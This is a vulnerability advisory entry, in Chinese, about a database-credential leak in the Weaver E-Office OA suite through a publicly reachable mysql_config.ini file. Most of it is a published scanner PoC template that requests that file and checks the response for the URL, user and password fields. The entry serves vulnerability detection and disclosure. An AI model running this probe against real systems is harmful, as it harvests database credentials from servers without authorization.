ecology-e-office-mysql-config-leak: 泛微OA E-Office mysql_config.ini 数据库信息泄漏

日期: 2025-09-01 | 影响软件: ecology e office | POC: 已公开

漏洞描述

泛微 E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息 app="泛微-EOffice"

PoC代码[已公开]

id: ecology-e-office-mysql-config-leak

info:
  name: 泛微OA E-Office mysql_config.ini 数据库信息泄漏
  author: zan8in
  severity: high
  verified: true
  description: |
    泛微 E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息
    app="泛微-EOffice"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html
  tags: ecology

rules:
    r0:
        request:
            method: GET
            path: /mysql_config.ini
        expression: response.status == 200 && response.body.bcontains(b'dataurl') && response.body.bcontains(b'datauser') && response.body.bcontains(b'datapassword')
expression: r0() 

相关漏洞推荐